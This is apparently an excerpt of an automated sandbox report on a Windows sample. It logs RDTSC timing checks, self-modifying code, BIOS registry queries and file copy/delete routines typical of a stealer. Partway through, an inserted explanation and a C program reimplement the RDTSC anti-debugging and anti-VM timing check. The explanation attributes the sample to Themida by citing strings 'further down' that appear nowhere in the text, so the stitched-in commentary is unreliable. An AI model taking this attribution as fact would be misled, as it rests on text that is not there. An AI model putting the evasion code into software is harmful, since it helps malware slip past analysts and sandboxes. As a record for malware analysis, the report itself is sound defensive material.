              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12121DB second address: 12121EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FB8DCE20296h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212375 second address: 121237D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212509 second address: 121250D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12131CA second address: 12131E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB8DCDE9E47h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216341 second address: 121635F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8DCE202A9h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121635F second address: 1216396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8DCDE9E36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FB8DCDE9E48h 0x00000015 pop ecx 0x00000016 jbe 00007FB8DCDE9E42h 0x0000001c jns 00007FB8DCDE9E36h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216396 second address: 121639A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121639A second address: 12163A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8DCDE9E3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12200F1 second address: 1220115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jng 00007FB8DCE2029Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB8DCE2029Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220115 second address: 122011B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225B7E second address: 1225B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225B87 second address: 1225B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E41h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225B9C second address: 1225BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222529 second address: 1222534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB8DCDE9E36h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222534 second address: 1222552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FB8DCE2029Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1222552 second address: 1222556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232A5C second address: 1232A68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FB8DCE20296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232A68 second address: 1232A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232A6E second address: 1232A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232A72 second address: 1232A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1236039 second address: 123604F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 jnp 00007FB8DCE202B3h 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AF29 second address: 124AF33 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8DCDE9E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AF33 second address: 124AF38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AF38 second address: 124AF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B0DD second address: 124B0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FB8DCE20296h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B0EC second address: 124B106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8DCDE9E3Eh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B22A second address: 124B230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B762 second address: 124B768 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B768 second address: 124B76F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B76F second address: 124B797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB8DCDE9E36h 0x00000011 jmp 00007FB8DCDE9E47h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B797 second address: 124B79B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124BA2B second address: 124BA45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8DCDE9E3Ch 0x0000000b jo 00007FB8DCDE9E3Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D261 second address: 124D267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D267 second address: 124D26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D26D second address: 124D271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D271 second address: 124D290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8DCDE9E40h 0x0000000c jne 00007FB8DCDE9E36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250155 second address: 125015B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125015B second address: 1250161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250161 second address: 1250165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1250165 second address: 1250169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1252CB6 second address: 1252CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE2029Bh 0x00000009 pop ecx 0x0000000a jg 00007FB8DCE2029Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1252CD4 second address: 1252CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1252CD9 second address: 1252CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FB8DCE2029Ch 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1252CF4 second address: 1252CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FF0219 second address: 4FF0253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push esp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov dx, 64CAh 0x0000000e pushfd 0x0000000f jmp 00007FB8DCE2029Bh 0x00000014 sub ax, EF6Eh 0x00000019 jmp 00007FB8DCE202A9h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FF0253 second address: 4FF0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FF0259 second address: 4FF02A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 movsx ebx, ax 0x00000013 pop esi 0x00000014 jmp 00007FB8DCE2029Dh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB8DCE202A8h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FF02A7 second address: 4FF02AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FF02AB second address: 4FF02B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FF02B1 second address: 4FF02B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FF02B7 second address: 4FF02BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
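The interceptor lines above record the protector's timing check: the result of the first rdtsc (EDX:EAX) is parked on the stack with push eax / push edx, a short run of filler executes (pop/push pairs, pushad/popad, jmp, mov dx, 64CAh / sub ax, EF6Eh), and a second rdtsc follows so the two readings can be subtracted and compared with a cycle budget. The filler costs tens of cycles on bare metal but thousands under a single-stepping debugger or a hypervisor that exits on RDTSC, which is what the sandbox's interceptor exists to defeat. The Software\WinLicense and Oreans.vxd strings further down identify the protector as Oreans WinLicense/Themida, whose RDTSC checks look exactly like this. The C program below is an added example written for this page, not code from the sample or from Joe Sandbox: it reproduces the probe-and-compare logic in plain C, keeps the minimum of several probes (single readings are inflated by interrupts, so both protectors and analysts score the minimum), and uses an assumed budget of 1000 cycles because the sample's own constant is not visible in the report. The non-x86 branch is only there so the file builds anywhere.

```c
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static uint64_t tsc_now(void) { return __rdtsc(); }   /* the real RDTSC, as in the trace */
#else
#include <time.h>
/* Non-x86 fallback so the example compiles everywhere; a protector only ever uses rdtsc. */
static uint64_t tsc_now(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One probe: read the counter, run a few cheap instructions, read it again.
   In the trace the first reading is saved with push eax / push edx while the
   push/pop/jmp filler runs; here the compiler keeps it in a register, which is equivalent. */
uint64_t tsc_probe_once(void) {
    uint64_t t0 = tsc_now();
    volatile uint16_t dx = 0x64CA;          /* stand-in for the mov dx,64CAh / sub ax,EF6Eh filler */
    dx = (uint16_t)(dx - 0xEF6E);
    uint64_t t1 = tsc_now();
    return t1 - t0;
}

/* Smallest delta over several probes: timer interrupts and context switches inflate
   individual readings, so the minimum, not the mean, is what gets compared. */
uint64_t tsc_probe_min(int rounds) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < rounds; i++) {
        uint64_t d = tsc_probe_once();
        if (d < best) best = d;
    }
    return best;
}

/* The protector's verdict. Native hardware runs the filler in tens of cycles; a single-stepping
   debugger or a hypervisor that traps RDTSC adds thousands. The budget is an assumption made
   for this example; the sample's constant is not shown in the report. */
#define ASSUMED_CYCLE_BUDGET 1000u
int tsc_looks_instrumented(uint64_t min_delta, uint64_t budget) { return min_delta > budget; }

int main(void) {
    uint64_t d = tsc_probe_min(64);
    printf("min rdtsc delta: %llu -> %s\n", (unsigned long long)d,
           tsc_looks_instrumented(d, ASSUMED_CYCLE_BUDGET) ? "looks instrumented" : "looks native");
    return 0;
}
```

Run it natively and then under a debugger with single-stepping (or a VM configured to exit on RDTSC) to see the delta jump by orders of magnitude. On a hypervisor that passes the TSC through with offsetting the probe reads native, which is why a sandbox has to intercept the instruction and control what the two readings return rather than simply trap it.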
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: FAFA8F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: FAFB45 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: FAD35E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11E5EE7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_0-26860
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes | graph_0-25678
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.7 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D718A0 | lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D73910 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D71250 | lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D71269 | lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7E210 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7CBE0 | wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D72390 | lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6DB99 | lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6DB80 | lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D723A9 | lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D74B10 | lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D74B29 | lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7D530 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7DD30 | GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
